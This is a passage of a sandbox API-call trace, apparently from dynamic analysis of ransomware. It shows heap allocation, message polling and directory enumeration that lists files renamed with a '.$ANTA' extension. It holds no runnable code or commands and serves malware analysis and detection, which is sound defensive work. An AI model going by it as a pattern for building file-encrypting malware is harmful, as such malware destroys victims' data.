lpMem=0x43cf8b0 | out: hHeap=0x1780000) returned 1 [0080.323] HeapFree (in: hHeap=0x1780000, dwFlags=0x0, lpMem=0x43e25f0 | out: hHeap=0x1780000) returned 1 [0080.323] PeekMessageW (in: lpMsg=0x144edac, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x144edac) returned 0 [0080.323] RtlAllocateHeap (HeapHandle=0x1780000, Flags=0x0, Size=0x8) returned 0x43e25c0 [0080.323] RtlAllocateHeap (HeapHandle=0x1780000, Flags=0x0, Size=0x20a) returned 0x43ea2e0 [0080.323] RtlAllocateHeap (HeapHandle=0x1780000, Flags=0x0, Size=0x4) returned 0x43e25f0 [0080.323] HeapFree (in: hHeap=0x1780000, dwFlags=0x0, lpMem=0x43ea2e0 | out: hHeap=0x1780000) returned 1 [0080.323] HeapFree (in: hHeap=0x1780000, dwFlags=0x0, lpMem=0x43e25f0 | out: hHeap=0x1780000) returned 1 [0080.323] HeapFree (in: hHeap=0x1780000, dwFlags=0x0, lpMem=0x43e25c0 | out: hHeap=0x1780000) returned 1 [0080.323] PeekMessageW (in: lpMsg=0x144edac, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x144edac) returned 0 [0080.323] RtlAllocateHeap (HeapHandle=0x1780000, Flags=0x0, Size=0x8) returned 0x43e25c0 [0080.323] HeapFree (in: hHeap=0x1780000, dwFlags=0x0, lpMem=0x43e25c0 | out: hHeap=0x1780000) returned 1 [0080.323] RtlAllocateHeap (HeapHandle=0x1780000, Flags=0x0, Size=0x38) returned 0x41ac2c0 [0080.323] PeekMessageW (in: lpMsg=0x144edac, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x144edac) returned 0 [0080.323] RtlAllocateHeap (HeapHandle=0x1780000, Flags=0x0, Size=0x8) returned 0x43e25c0 [0080.323] RtlAllocateHeap (HeapHandle=0x1780000, Flags=0x0, Size=0x20) returned 0x43cf8b0 [0080.323] RtlAllocateHeap (HeapHandle=0x1780000, Flags=0x0, Size=0x10) returned 0x43cad18 [0080.323] RtlAllocateHeap (HeapHandle=0x1780000, Flags=0x0, Size=0x8) returned 0x43e25e0 [0080.323] HeapFree (in: hHeap=0x1780000, dwFlags=0x0, lpMem=0x43e25e0 | out: hHeap=0x1780000) returned 1 [0080.323] RtlAllocateHeap (HeapHandle=0x1780000, Flags=0x0, Size=0x10) returned 0x43cacd0 [0080.323] RtlAllocateHeap (HeapHandle=0x1780000, Flags=0x0, Size=0x4) returned 0x43e25e0 [0080.324] RtlAllocateHeap (HeapHandle=0x1780000, Flags=0x0, Size=0x10) returned 0x43cac88 [0080.324] HeapFree (in: hHeap=0x1780000, dwFlags=0x0, lpMem=0x43cad18 | out: hHeap=0x1780000) returned 1 [0080.324] HeapFree (in: hHeap=0x1780000, dwFlags=0x0, lpMem=0x43cf8b0 | out: hHeap=0x1780000) returned 1 [0080.324] HeapFree (in: hHeap=0x1780000, dwFlags=0x0, lpMem=0x43e25c0 | out: hHeap=0x1780000) returned 1 [0080.324] HeapFree (in: hHeap=0x1780000, dwFlags=0x0, lpMem=0x43cacd0 | out: hHeap=0x1780000) returned 1 [0080.324] PeekMessageW (in: lpMsg=0x144edac, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x144edac) returned 0 [0080.324] RtlAllocateHeap (HeapHandle=0x1780000, Flags=0x0, Size=0x8) returned 0x43e25f0 [0080.324] RtlAllocateHeap (HeapHandle=0x1780000, Flags=0x0, Size=0x20a) returned 0x43ea730 [0080.324] RtlAllocateHeap (HeapHandle=0x1780000, Flags=0x0, Size=0x4) returned 0x43e25c0 [0080.324] HeapFree (in: hHeap=0x1780000, dwFlags=0x0, lpMem=0x43ea730 | out: hHeap=0x1780000) returned 1 [0080.324] HeapFree (in: hHeap=0x1780000, dwFlags=0x0, lpMem=0x43e25c0 | out: hHeap=0x1780000) returned 1 [0080.324] HeapFree (in: hHeap=0x1780000, dwFlags=0x0, lpMem=0x43e25f0 | out: hHeap=0x1780000) returned 1 [0080.324] PeekMessageW (in: lpMsg=0x144edac, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x144edac) returned 0 [0080.324] RtlAllocateHeap (HeapHandle=0x1780000, Flags=0x0, Size=0x8) returned 0x43e25c0 [0080.324] RtlAllocateHeap (HeapHandle=0x1780000, Flags=0x0, Size=0x8) returned 0x43e25f0 [0080.324] RtlAllocateHeap (HeapHandle=0x1780000, Flags=0x0, Size=0x8) returned 0x43e2740 [0080.324] RtlAllocateHeap (HeapHandle=0x1780000, Flags=0x0, Size=0x18) returned 0x1796e88 [0080.324] RtlAllocateHeap (HeapHandle=0x1780000, Flags=0x0, Size=0x20a) returned 0x43e93c8 [0080.324] RtlAllocateHeap (HeapHandle=0x1780000, Flags=0x0, Size=0x4) returned 0x43e28b0 [0080.324] HeapFree (in: hHeap=0x1780000, dwFlags=0x0, lpMem=0x43e93c8 | out: hHeap=0x1780000) returned 1 [0080.324] HeapFree (in: hHeap=0x1780000, dwFlags=0x0, lpMem=0x43e28b0 | out: hHeap=0x1780000) returned 1 [0080.324] HeapFree (in: hHeap=0x1780000, dwFlags=0x0, lpMem=0x43e2740 | out: hHeap=0x1780000) returned 1 [0080.324] HeapFree (in: hHeap=0x1780000, dwFlags=0x0, lpMem=0x1796e88 | out: hHeap=0x1780000) returned 1 [0080.324] HeapFree (in: hHeap=0x1780000, dwFlags=0x0, lpMem=0x43e25f0 | out: hHeap=0x1780000) returned 1 [0080.324] HeapFree (in: hHeap=0x1780000, dwFlags=0x0, lpMem=0x43e25c0 | out: hHeap=0x1780000) returned 1 [0080.324] RtlAllocateHeap (HeapHandle=0x1780000, Flags=0x0, Size=0x20) returned 0x43cf8b0 [0080.324] RtlAllocateHeap (HeapHandle=0x1780000, Flags=0x0, Size=0xc) returned 0x43cab50 [0080.324] RtlAllocateHeap (HeapHandle=0x1780000, Flags=0x0, Size=0xc) returned 0x43cacd0 [0080.324] HeapFree (in: hHeap=0x1780000, dwFlags=0x0, lpMem=0x43cab50 | out: hHeap=0x1780000) returned 1 [0080.324] HeapFree (in: hHeap=0x1780000, dwFlags=0x0, lpMem=0x43cacd0 | out: hHeap=0x1780000) returned 1 [0080.324] HeapFree (in: hHeap=0x1780000, dwFlags=0x0, lpMem=0x43cf8b0 | out: hHeap=0x1780000) returned 1 [0080.325] PeekMessageW (in: lpMsg=0x144edac, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x144edac) returned 0 [0080.325] RtlAllocateHeap (HeapHandle=0x1780000, Flags=0x0, Size=0x8) returned 0x43e25c0 [0080.325] HeapFree (in: hHeap=0x1780000, dwFlags=0x0, lpMem=0x43e25c0 | out: hHeap=0x1780000) returned 1 [0080.325] PeekMessageW (in: lpMsg=0x144edac, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x144edac) returned 0 [0080.325] RtlAllocateHeap (HeapHandle=0x1780000, Flags=0x0, Size=0x8) returned 0x43e25c0 [0080.325] RtlAllocateHeap (HeapHandle=0x1780000, Flags=0x0, Size=0x20) returned 0x43cf8b0 [0080.325] RtlAllocateHeap (HeapHandle=0x1780000, Flags=0x0, Size=0x10) returned 0x43cac70 [0080.325] RtlAllocateHeap (HeapHandle=0x1780000, Flags=0x0, Size=0x8) returned 0x43e25f0 [0080.325] HeapFree (in: hHeap=0x1780000, dwFlags=0x0, lpMem=0x43e25f0 | out: hHeap=0x1780000) returned 1 [0080.325] FindNextFileW (in: hFindFile=0x41ac440, lpFindFileData=0x144e7e0 | out: lpFindFileData=0x144e7e0*(dwFileAttributes=0x20, ftCreationTime.dwLowDateTime=0xfbcb5c61, ftCreationTime.dwHighDateTime=0x1d69b3e, ftLastAccessTime.dwLowDateTime=0xfbcb5c61, ftLastAccessTime.dwHighDateTime=0x1d69b3e, ftLastWriteTime.dwLowDateTime=0xfbd020fc, ftLastWriteTime.dwHighDateTime=0x1d69b3e, nFileSizeHigh=0x0, nFileSizeLow=0x13c0, dwReserved0=0x144ecd8, dwReserved1=0x8, cFileName="JzioP.odp.$ANTA", cAlternateFileName="JZIOPO~1.$AN")) returned 1 [0080.325] RtlAllocateHeap (HeapHandle=0x1780000, Flags=0x0, Size=0x10) returned 0x43cac28 [0080.325] RtlAllocateHeap (HeapHandle=0x1780000, Flags=0x0, Size=0x20) returned 0x43cf978 [0080.325] RtlAllocateHeap (HeapHandle=0x1780000, Flags=0x0, Size=0x4) returned 0x43e25f0 [0080.325] HeapFree (in: hHeap=0x1780000, dwFlags=0x0, lpMem=0x43cac70 | out: hHeap=0x1780000) returned 1 [0080.325] HeapFree (in: hHeap=0x1780000, dwFlags=0x0, lpMem=0x43cf8b0 | out: hHeap=0x1780000) returned 1 [0080.325] HeapFree (in: hHeap=0x1780000, dwFlags=0x0, lpMem=0x43e25c0 | out: hHeap=0x1780000) returned 1 [0080.325] HeapFree (in: hHeap=0x1780000, dwFlags=0x0, lpMem=0x43cf978 | out: hHeap=0x1780000) returned 1 [0080.325] HeapFree (in: hHeap=0x1780000, dwFlags=0x0, lpMem=0x43e25f0 | out: hHeap=0x1780000) returned 1 [0080.325] HeapFree (in: hHeap=0x1780000, dwFlags=0x0, lpMem=0x43cac28 | out: hHeap=0x1780000) returned 1 [0080.325] PeekMessageW (in: lpMsg=0x144edac, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x144edac) returned 0 [0080.325] RtlAllocateHeap (HeapHandle=0x1780000, Flags=0x0, Size=0x8) returned 0x43e25c0 [0080.325] RtlAllocateHeap (HeapHandle=0x1780000, Flags=0x0, Size=0x20a) returned 0x43e9a40 [0080.325] RtlAllocateHeap (HeapHandle=0x1780000, Flags=0x0, Size=0x4) returned 0x43e25f0 [0080.325] HeapFree (in: hHeap=0x1780000, dwFlags=0x0, lpMem=0x43e9a40 | out: hHeap=0x1780000) returned 1 [0080.325] HeapFree (in: hHeap=0x1780000, dwFlags=0x0, lpMem=0x43e25f0 | out: hHeap=0x1780000) returned 1 [0080.325] HeapFree (in: hHeap=0x1780000, dwFlags=0x0, lpMem=0x43e25c0 | out: hHeap=0x1780000) returned 1 [0080.325] PeekMessageW (in: lpMsg=0x144edac, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x144edac) returned 0 [0080.325] RtlAllocateHeap (HeapHandle=0x1780000, Flags=0x0, Size=0x8) returned 0x43e25c0 [0080.325] RtlAllocateHeap (HeapHandle=0x1780000, Flags=0x0, Size=0x8) returned 0x43e25f0 [0080.325] RtlAllocateHeap (HeapHandle=0x1780000, Flags=0x0, Size=0x8) returned 0x43e27a0 [0080.325] RtlAllocateHeap (HeapHandle=0x1780000, Flags=0x0, Size=0x18) returned 0x1797088 [0080.325] RtlAllocateHeap (HeapHandle=0x1780000, Flags=0x0, Size=0x20a) returned 0x43e9c68 [0080.325] RtlAllocateHeap (HeapHandle=0x1780000, Flags=0x0, Size=0x4) returned 0x43e2860 [0080.326] HeapFree (in: hHeap=0x1780000, dwFlags=0x0, lpMem=0x43e9c68 | out: hHeap=0x1780000) returned 1 [0080.326] HeapFree (in: hHeap=0x1780000, dwFlags=0x0, lpMem=0x43e2860 | out: hHeap=0x1780000) returned 1 [0080.326] HeapFree (in: hHeap=0x1780000, dwFlags=0x0, lpMem=0x43e27a0 | out: hHeap=0x1780000) returned 1 [0080.326] HeapFree (in: hHeap=0x1780000, dwFlags=0x0, lpMem=0x1797088 | out: hHeap=0x1780000) returned 1 [0080.326] HeapFree (in: hHeap=0x1780000, dwFlags=0x0, lpMem=0x43e25f0 | out: hHeap=0x1780000) returned 1 [0080.326] HeapFree (in: hHeap=0x1780000, dwFlags=0x0, lpMem=0x43e25c0 | out: hHeap=0x1780000) returned 1 [0080.326] RtlAllocateHeap (HeapHandle=0x1780000, Flags=0x0, Size=0x20) returned 0x43cf8b0 [0080.326] RtlAllocateHeap (HeapHandle=0x1780000, Flags=0x0, Size=0xc) returned 0x43cabc8 [0080.326] RtlAllocateHeap (HeapHandle=0x1780000, Flags=0x0, Size=0xc) returned 0x43cad48 [0080.326] HeapFree (in: hHeap=0x1780000, dwFlags=0x0, lpMem=0x43cabc8 | out: hHeap=0x1780000) returned 1 [0080.326] HeapFree (in: hHeap=0x1780000, dwFlags=0x0, lpMem=0x43cad48 | out: hHeap=0x1780000) returned 1 [0080.326] HeapFree (in: hHeap=0x1780000, dwFlags=0x0, lpMem=0x43cf8b0 | out: hHeap=0x1780000) returned 1 [0080.326] PeekMessageW (in: lpMsg=0x144edac, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x144edac) returned 0 [0080.326] RtlAllocateHeap (HeapHandle=0x1780000, Flags=0x0, Size=0x8) returned 0x43e25c0 [0080.326] HeapFree (in: hHeap=0x1780000, dwFlags=0x0, lpMem=0x43e25c0 | out: hHeap=0x1780000) returned 1 [0080.326] PeekMessageW (in: lpMsg=0x144edac, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x144edac) returned 0 [0080.326] RtlAllocateHeap (HeapHandle=0x1780000, Flags=0x0, Size=0x8) returned 0x43e25c0 [0080.326] RtlAllocateHeap (HeapHandle=0x1780000, Flags=0x0, Size=0x20) returned 0x43cf8b0 [0080.326] RtlAllocateHeap (HeapHandle=0x1780000, Flags=0x0, Size=0x10) returned 0x43cacd0 [0080.326] RtlAllocateHeap (HeapHandle=0x1780000, Flags=0x0, Size=0x8) returned 0x43e25f0 [0080.326] HeapFree (in: hHeap=0x1780000, dwFlags=0x0, lpMem=0x43e25f0 | out: hHeap=0x1780000) returned 1 [0080.326] FindNextFileW (in: hFindFile=0x41ac440, lpFindFileData=0x144e7e0 | out: lpFindFileData=0x144e7e0*(dwFileAttributes=0x20, ftCreationTime.dwLowDateTime=0xfbd9aa6c, ftCreationTime.dwHighDateTime=0x1d69b3e, ftLastAccessTime.dwLowDateTime=0xfbd9aa6c, ftLastAccessTime.dwHighDateTime=0x1d69b3e, ftLastWriteTime.dwLowDateTime=0xfbe0d339, ftLastWriteTime.dwHighDateTime=0x1d69b3e, nFileSizeHigh=0x0, nFileSizeLow=0xbcb0, dwReserved0=0x144ecd8, dwReserved1=0x8, cFileName="lTD44h.ots.$ANTA", cAlternateFileName="LTD44H~1.$AN")) returned 1 [0080.326] RtlAllocateHeap (HeapHandle=0x1780000, Flags=0x0, Size=0x10) returned 0x43cad18 [0080.326] RtlAllocateHeap (HeapHandle=0x1780000, Flags=0x0, Size=0x30) returned 0x4391d20 [0080.326] RtlAllocateHeap (HeapHandle=0x1780000, Flags=0x0, Size=0x4) returned 0x43e25f0 [0080.326] HeapFree (in: hHeap=0x1780000, dwFlags=0x0, lpMem=0x43cacd0 | out: hHeap=0x1780000) returned 1 [0080.326] HeapFree (in: hHeap=0x1780000, dwFlags=0x0, lpMem=0x43cf8b0 | out: hHeap=0x1780000) returned 1 [0080.326] HeapFree (in: hHeap=0x1780000, dwFlags=0x0, lpMem=0x43e25c0 | out: hHeap=0x1780000) returned 1 [0080.326] HeapFree (in: hHeap=0x1780000, dwFlags=0x0, lpMem=0x4391d20 | out: hHeap=0x1780000) returned 1 [0080.326] HeapFree (in: hHeap=0x1780000, dwFlags=0x0, lpMem=0x43e25f0 | out: hHeap=0x1780000) returned 1 [0080.326] HeapFree (in: hHeap=0x1780000, dwFlags=0x0, lpMem=0x43cad18 | out: hHeap=0x1780000) returned 1 [0080.326] PeekMessageW (in: lpMsg=0x144edac, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x144edac) returned 0 [0080.342] RtlAllocateHeap (HeapHandle=0x1780000, Flags=0x0, Size=0x8) returned 0x43e25c0 [0080.342] RtlAllocateHeap (HeapHandle=0x1780000, Flags=0x0, Size=0x20a) returned 0x43ea958 [0080.342] RtlAllocateHeap (HeapHandle=0x1780000, Flags=0x0, Size=0x4) returned 0x43e25f0 [0080.342] HeapFree (in: hHeap=0x1780000, dwFlags=0x0, lpMem=0x43ea958 | out: hHeap=0x1780000) returned 1 [0080.342] HeapFree (in: hHeap=0x1780000, dwFlags=0x0, lpMem=0x43e25f0 | out: hHeap=0x1780000) returned 1 [0080.342] HeapFree (in: hHeap=0x1780000, dwFlags=0x0, lpMem=0x43e25c0 | out: hHeap=0x1780000) returned 1 [0080.342] PeekMessageW (in: lpMsg=0x144edac, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x144edac) returned 0 [0080.342] RtlAllocateHeap (HeapHandle=0x1780000, Flags=0x0, Size=0x8) returned 0x43e25c0 [0080.342] RtlAllocateHeap (HeapHandle=0x1780000, Flags=0x0, Size=0x8) returned 0x43e25f0 [0080.342] RtlAllocateHeap (HeapHandle=0x1780000, Flags=0x0, Size=0x8) returned 0x43e27a0 [0080.342] RtlAllocateHeap (HeapHandle=0x1780000, Flags=0x0, Size=0x18) returned 0x1796d88 [0080.342] RtlAllocateHeap (HeapHandle=0x1780000, Flags=0x0, Size=0x20a) returned 0x43e9e90 [0080.342] RtlAllocateHeap (HeapHandle=0x1780000, Flags=0x0, Size=0x4) returned 0x43e2740 [0080.342] HeapFree (in: hHeap=0x1780000, dwFlags=0x0, lpMem=0x43e9e90 | out: hHeap=0x1780000) returned 1 [0080.343] HeapFree (in: hHeap=0x1780000, dwFlags=0x0, lpMem=0x43e2740 | out: hHeap=0x1780000) returned 1 [0080.343] HeapFree (in: hHeap=0x1780000, dwFlags=0x0, lpMem=0x43e27a0 | out: hHeap=0x1780000) returned 1 [0080.343] HeapFree (in: hHeap=0x1780000, dwFlags=0x0, lpMem=0x1796d88 | out: hHeap=0x1780000) returned 1 [0080.343] HeapFree (in: hHeap=0x1780000, dwFlags=0x0, lpMem=0x43e25f0 | out: hHeap=0x1780000) returned 1 [0080.343] HeapFree (in: hHeap=0x1780000, dwFlags=0x0, lpMem=0x43e25c0 | out: hHeap=0x1780000) returned 1 [0080.343] RtlAllocateHeap (HeapHandle=0x1780000, Flags=0x0, Size=0x20) returned 0x43cf8b0 [0080.343] RtlAllocateHeap (HeapHandle=0x1780000, Flags=0x0, Size=0xc) returned 0x43cace8 [0080.343] RtlAllocateHeap (HeapHandle=0x1780000, Flags=0x0, Size=0xc) returned 0x43cabc8 [0080.343] HeapFree (in: hHeap=0x1780000, dwFlags=0x0, lpMem=0x43cace8 | out: hHeap=0x1780000) returned 1 [0080.343] HeapFree (in: hHeap=0x1780000, dwFlags=0x0, lpMem=0x43cabc8 | out: hHeap=0x1780000) returned 1 [0080.343] HeapFree (in: hHeap=0x1780000, dwFlags=0x0, lpMem=0x43cf8b0 | out: hHeap=0x1780000) returned 1 [0080.343] PeekMessageW (in: lpMsg=0x144edac, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x144edac) returned 0 [0080.343] RtlAllocateHeap (HeapHandle=0x1780000, Flags=0x0, Size=0x8) returned 0x43e25c0 [0080.343] HeapFree (in: hHeap=0x1780000, dwFlags=0x0, lpMem=0x43e25c0 | out: hHeap=0x1780000) returned 1 [0080.343] PeekMessageW (in: lpMsg=0x144edac, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x144edac) returned 0 [0080.343] RtlAllocateHeap (HeapHandle=0x1780000, Flags=0x0, Size=0x8) returned 0x43e25c0 [0080.343] RtlAllocateHeap (HeapHandle=0x1780000, Flags=0x0, Size=0x20) returned 0x43cf8b0 [0080.343] RtlAllocateHeap (HeapHandle=0x1780000, Flags=0x0, Size=0x10) returned 0x43cabc8 [0080.343] RtlAllocateHeap (HeapHandle=0x1780000, Flags=0x0, Size=0x8) returned 0x43e25f0 [0080.343] HeapFree (in: hHeap=0x1780000, dwFlags=0x0, lpMem=0x43e25f0 | out: hHeap=0x1780000) returned 1 [0080.343] FindNextFileW (in: hFindFile=0x41ac440, lpFindFileData=0x144e7e0 | out: lpFindFileData=0x144e7e0*(dwFileAttributes=0x20, ftCreationTime.dwLowDateTime=0xfbf3e47b, ftCreationTime.dwHighDateTime=0x1d69b3e, ftLastAccessTime.dwLowDateTime=0xfbf3e47b, ftLastAccessTime.dwHighDateTime=0x1d69b3e, ftLastWriteTime.dwLowDateTime=0xfbfd6d69, ftLastWriteTime.dwHighDateTime=0x1d69b3e, nFileSizeHigh=0x0, nFileSizeLow=0x16380, dwReserved0=0x144ecd8, dwReserved1=0x8, cFileName="VmdYvxc3Ol-gmt2M.xls.$ANTA", cAlternateFileName="VMDYVX~1.$AN")) returned 1 [0080.343] RtlAllocateHeap (HeapHandle=0x1780000, Flags=0x0, Size=0x10) returned 0x43cab68 [0080.343] RtlAllocateHeap (HeapHandle=0x1780000, Flags=0x0, Size=0x40) returned 0x43a9218 [0080.343] RtlAllocateHeap (HeapHandle=0x1780000, Flags=0x0, Size=0x4) returned 0x43e25f0 [0080.343] HeapFree (in: hHeap=0x1780000, dwFlags=0x0, lpMem=0x43cabc8 | out: hHeap=0x1780000) returned 1 [0080.343] HeapFree (in: hHeap=0x1780000, dwFlags=0x0, lpMem=0x43cf8b0 | out: hHeap=0x1780000) returned 1 [0080.343] HeapFree (in: hHeap=0x1780000, dwFlags=0x0, lpMem=0x43e25c0 | out: hHeap=0x1780000) returned 1 [0080.343] HeapFree (in: hHeap=0x1780000, dwFlags=0x0, lpMem=0x43a9218 | out: hHeap=0x1780000) returned 1 [0080.343] HeapFree (in: hHeap=0x1780000, dwFlags=0x0, lpMem=0x43e25f0 | out: hHeap=0x1780000) returned 1 [0080.343] HeapFree (in: hHeap=0x1780000, dwFlags=0x0, lpMem=0x43cab68 | out: hHeap=0x1780000) returned 1 [0080.343] PeekMessageW (in: lpMsg=0x144edac, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x144edac) returned 0 [0080.344] RtlAllocateHeap (HeapHandle=0x1780000, Flags=0x0, Size=0x8) returned 0x43e25c0 [0080.344] RtlAllocateHeap (HeapHandle=0x1780000, Flags=0x0, Size=0x20a) returned 0x43e9818 [0080.344] RtlAllocateHeap (HeapHandle=0x1780000, Flags=0x0, Size=0x4) returned 0x43e25f0 [0080.344] HeapFree (in: hHeap=0x1780000, dwFlags=0x0, lpMem=0x43e9818 | out: hHeap=0x1780000) returned 1 [0080.344] HeapFree (in: hHeap=0x1780000, dwFlags=0x0, lpMem=0x43e25f0 | out: hHeap=0x1780000) returned 1 [0080.344] HeapFree (in: hHeap=0x1780000, dwFlags=0x0, lpMem=0x43e25c0 | out: hHeap=0x1780000) returned 1 [0080.344] PeekMessageW (in: lpMsg=0x144edac, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x144edac) returned 0 [0080.344] RtlAllocateHeap (HeapHandle=0x1780000, Flags=0x0, Size=0x8) returned 0x43e25f0 [0080.344] RtlAllocateHeap (HeapHandle=0x1780000, Flags=0x0, Size=0x8) returned 0x43e25c0 [0080.344] RtlAllocateHeap (HeapHandle=0x1780000, Flags=0x0, Size=0x8) returned 0x43e27f0 [0080.344] RtlAllocateHeap (HeapHandle=0x1780000, Flags=0x0, Size=0x18) returned 0x1796fc8 [0080.344] RtlAllocateHeap (HeapHandle=0x1780000, Flags=0x0, Size=0x20a) returned 0x43e9a40 [0080.345] RtlAllocateHeap (HeapHandle=0x1780000, Flags=0x0, Size=0x4) returned 0x43e2850 [0080.345] HeapFree (in: hHeap=0x1780000, dwFlags=0x0, lpMem=0x43e9a40 | out: hHeap=0x1780000) returned 1 [0080.345] HeapFree (in: hHeap=0x1780000, dwFlags=0x0, lpMem=0x43e2850 | out: hHeap=0x1780000) returned 1 [0080.345] HeapFree (in: hHeap=0x1780000, dwFlags=0x0, lpMem=0x43e27f0 | out: hHeap=0x1780000) returned 1 [0080.345] HeapFree (in: hHeap=0x1780000, dwFlags=0x0, lpMem=0x1796fc8 | out: hHeap=0x1780000) returned 1 [0080.345] HeapFree (in: hHeap=0x1780000, dwFlags=0x0, lpMem=0x43e25c0 | out: hHeap=0x1780000) returned 1 [0080.345] HeapFree (in: hHeap=0x1780000, dwFlags=0x0, lpMem=0x43e25f0 | out: hHeap=0x1780000) returned 1 [0080.345] RtlAllocateHeap (HeapHandle=0x1780000, Flags=0x0, Size=0x20) returned 0x43cf8b0 [0080.345] RtlAllocateHeap (HeapHandle=0x1780000, Flags=0x0, Size=0xc) returned 0x43cab68 [0080.345] RtlAllocateHeap (HeapHandle=0x1780000, Flags=0x0, Size=0xc) returned 0x43cacd0 [0080.345] HeapFree (in: hHeap=0x1780000, dwFlags=0x0, lpMem=0x43cab68 | out: hHeap=0x1780000) returned 1 [0080.345] HeapFree (in: hHeap=0x1780000, dwFlags=0x0, lpMem=0x43cacd0 | out: hHeap=0x1780000) returned 1 [0080.345] HeapFree (in: hHeap=0x1780000, dwFlags=0x0, lpMem=0x43cf8b0 | out: hHeap=0x1780000) returned 1 [0080.345] PeekMessageW (in: lpMsg=0x144edac, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x144edac) returned 0 [0080.346] HeapFree (in: hHeap=0x1780000, dwFlags=0x0, lpMem=0x43e25c0 | out: hHeap=0x1780000) returned 1 [0080.346] PeekMessageW (in: lpMsg=0x144edac, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x144edac) returned 0 [0080.346] HeapFree (in: hHeap=0x1780000, dwFlags=0x0, lpMem=0x43e25f0 | out: hHeap=0x1780000) returned 1 [0080.346] FindNextFileW (in: hFindFile=0x41ac440, lpFindFileData=0x144e7e0 | out: lpFindFileData=0x144e7e0*(dwFileAttributes=0x10, ftCreationTime.dwLowDateTime=0xacbde450, ftCreationTime.dwHighDateTime=0x1d5ecfb, ftLastAccessTime.dwLowDateTime=0x3c566ca0, ftLastAccessTime.dwHighDateTime=0x1d5e139, ftLastWriteTime.dwLowDateTime=0x3c566ca0, ftLastWriteTime.dwHighDateTime=0x1d5e139, nFileSizeHigh=0x0, nFileSizeLow=0x0, dwReserved0=0x144ecd8, dwReserved1=0x8, cFileName="WZ9w", cAlternateFileName="")) returned 1 [0080.346] HeapFree (in: hHeap=0x1780000, dwFlags=0x0, lpMem=0x43caad8 | out: hHeap=0x1780000) returned 1 [0080.346] HeapFree (in: hHeap=0x1780000, dwFlags=0x0, lpMem=0x43cf8b0 | out: hHeap=0x1780000) returned 1 [0080.346] HeapFree (in: hHeap=0x1780000, dwFlags=0x0, lpMem=0x43e25c0 | out: hHeap=0x1780000) returned 1 [0080.346] HeapFree (in: hHeap=0x1780000, dwFlags=0x0, lpMem=0x43caaf0 | out: hHeap=0x1780000) returned 1 [0080.346] HeapFree (in: hHeap=0x1780000, dwFlags=0x0, lpMem=0x43e25f0 | out: hHeap=0x1780000) returned 1 [0080.346] HeapFree (in: hHeap=0x1780000, dwFlags=0x0, lpMem=0x43cabc8 | out: hHeap=0x1780000) returned 1 [0080.346] PeekMessageW (in: lpMsg=0x144edac, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x144edac) returned 0 [0080.346] HeapFree (in: hHeap=0x1780000, dwFlags=0x0, lpMem=0x43e93c8 | out: hHeap=0x1780000) returned 1 [0080.346] HeapFree (in: hHeap=0x1780000, dwFlags=0x0, lpMem=0x43e25f0 | out: hHeap=0x1780000) returned 1 [0080.346] HeapFree (in: hHeap=0x1780000, dwFlags=0x0, lpMem=0x43e25c0 | out: hHeap=0x1780000) returned 1 [0080.346] PeekMessageW (in: lpMsg=0x144edac, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x144edac) returned 0 [0080.346] HeapFree (in: hHeap=0x1780000, dwFlags=0x0, lpMem=0x43e9c68 | out: hHeap=0x1780000) returned 1 [0080.346] HeapFree (in: hHeap=0x1780000, dwFlags=0x0, lpMem=0x43e28a0 | out: hHeap=0x1780000) returned 1 [0080.346] HeapFree (in: hHeap=0x1780000, dwFlags=0x0, lpMem=0x43e2800 | out: hHeap=0x1780000) returned 1 [0080.346] HeapFree (in: hHeap=0x1780000, dwFlags=0x0, lpMem=0x1796de8 | out: hHeap=0x1780000) returned 1 [0080.346] HeapFree (in: hHeap=0x1780000, dwFlags=0x0, lpMem=0x43e25f0 | out: hHeap=0x1780000) returned 1 [0080.346] HeapFree (in: hHeap=0x1780000, dwFlags=0x0, lpMem=0x43e25c0 | out: hHeap=0x1780000) returned 1 [0080.346] PeekMessageW (in: lpMsg=0x144edac, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x144edac) returned 0 [0080.346] HeapFree (in: hHeap=0x1780000, dwFlags=0x0, lpMem=0x43cad48 | out: hHeap=0x1780000) returned 1 [0080.346] HeapFree (in: hHeap=0x1780000, dwFlags=0x0, lpMem=0x43cab50 | out: 